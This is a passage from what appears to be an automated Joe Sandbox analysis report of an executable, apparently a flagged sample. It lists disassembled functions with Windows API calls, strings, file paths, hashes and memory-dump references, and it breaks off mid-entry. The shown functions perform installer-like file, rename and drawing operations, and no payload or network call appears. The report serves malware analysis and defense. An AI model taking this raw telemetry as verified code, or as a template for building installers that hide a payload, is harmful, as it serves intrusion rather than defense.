Part of subcall function 00405934: lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976

GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405AAC
wsprintfA.USER32 ref: 00405ACA
GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B05
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B14
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405B2E
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405B5E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00430498,00000000,-0000000A,0040A514,00000000,[Rename]), ref: 00405BB4
WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405BC6
GlobalFree.KERNEL32(00000000), ref: 00405BCD
CloseHandle.KERNEL32(00000000), ref: 00405BD4

Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5

Strings

[Rename], xrefs: 00405B46, 00405B58
NUL, xrefs: 00405A5C
%ls=%ls, xrefs: 00405AC0

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 3756836283-899692902
Opcode ID: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
Instruction ID: 2fe29930d4e79bd0ae977f5d9eb33e4478da98161fe3751d0f08acbad4e80cd6
Opcode Fuzzy Hash: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
Instruction Fuzzy Hash: 0C410471200B05BFD2206B219D49F6B3AACEF85715F14043AF941F62D2EA7CF8018A7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4

Function 00405FDA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 0040603D
CharNextW.USER32(?,?,?,00000000), ref: 0040604C
CharNextW.USER32(?,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406051
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406064

Strings

"C:\Users\user\Desktop\ro7eoySJ9q.exe", xrefs: 0040601E
*?|<>/":, xrefs: 0040602C
C:\Users\user\AppData\Local\Temp\, xrefs: 00405FDB, 00405FE0

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2032666725
Opcode ID: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
Instruction ID: fcf87bb4fcb389795acbe35438f6f12f46fcdf00a5008526b505f25df9ba4f2d
Opcode Fuzzy Hash: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
Instruction Fuzzy Hash: B511B62684061299DB307B149C40B7763B8EF95760F51803FED8A732C0E77C5C9297AD

Function 004024EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(Heteric,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,Heteric,00000000,?,?,00000000,00000011), ref: 00402566

Strings

Heteric, xrefs: 004024F8, 00402519, 00402523, 00402533, 0040255A
C:\Program Files (x86)\edelweissen\romanblade.ini, xrefs: 00402526
8, xrefs: 0040250A

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8$C:\Program Files (x86)\edelweissen\romanblade.ini$Heteric
API String ID: 1453599865-1441359250
Opcode ID: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
Instruction ID: 735716144e4411cb43a0d30ab2875379506436d26c05ff50a3a47e8288d67bee
Opcode Fuzzy Hash: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
Instruction Fuzzy Hash: 62019271A44604FED700ABB19E4DEAF7668EF5031AF20053BB102B60D1D6FC4D919A6D

Function 00403FFC Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404019
GetSysColor.USER32(00000000), ref: 00404035
SetTextColor.GDI32(?,00000000), ref: 00404041
SetBkMode.GDI32(?,?), ref: 0040404D
GetSysColor.USER32(?), ref: 00404060
SetBkColor.GDI32(?,?), ref: 00404070
DeleteObject.GDI32(?), ref: 0040408A
CreateBrushIndirect.GDI32(?), ref: 00404094

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
Instruction ID: 0ac1a71073e56fec278c78bb8edfd769e40e3e7d0c6ffac740e8a400aad481d4
Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
Instruction Fuzzy Hash: 7D2142B1500704ABC7319F68DE48B5B7BF8AF80714F04892DEA96B22A1D738E904CB54

Function 0040274B Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
GlobalFree.KERNEL32(00000000), ref: 0040280D
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
Instruction ID: 2d0112b2776dca8d717dfd9e18d313b89dca9e7a3efaaf21f9fdf9ae57e92bf3
Opcode Fuzzy Hash: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
Instruction Fuzzy Hash: CE317C72800128BBCF116FA5CE499AE7A79EF09364F10423AF521762E0CB794D419BA8

Function 004048C4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004048DF
GetMessagePos.USER32 ref: 004048E7
ScreenToClient.USER32(?,?), ref: 00404901
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404913
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404939

Strings

f, xrefs: 00404915

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
Instruction ID: b2acda07281727c86be124b4dee47d1cf8a7ad48e0f381a449079fc6aa512a42
Opcode Fuzzy Hash: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
Instruction Fuzzy Hash: 6F014C71900219BADB10DBA4DD85BFFBBBCAF59711F10012ABB50B61D0D6B499018BA4

Function 00402C15 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
MulDiv.KERNEL32(001026CB,00000064,00102FB8), ref: 00402C5E
wsprintfW.USER32 ref: 00402C6E
SetWindowTextW.USER32(?,?), ref: 00402C7E
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C90

Strings

verifying installer: %d%%, xrefs: 00402C68

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
Instruction ID: fc2375c20bf1a940e442d42f67f4bd9350dc1e6ed8ae84fb9db5d2f1b0513ae1
Opcode Fuzzy Hash: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
Instruction Fuzzy Hash: 28014F70640208BBEF24AF61DD49BEE3B69FB04309F008439FA06A91D0DBB89555CF59

Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC

Strings

Calibri, xrefs: 00401DA2

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
Instruction ID: ac5daf38e842c3ef37672eab1df37869b96295c9a8c7d69064dded374e835ef9
Opcode Fuzzy Hash: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
Instruction Fuzzy Hash: 1B016D35544640EFEB016BB0AF4AB9A3FB4EF25305F144579F545B62E2CA78040A9B2D

Function 00402571 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000001,?), ref: 004025CA
MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607

Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A

Strings

9, xrefs: 004025B6

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: FileRead$ByteCharMultiWidewsprintf
String ID: 9
API String ID: 3029736425-2366072709
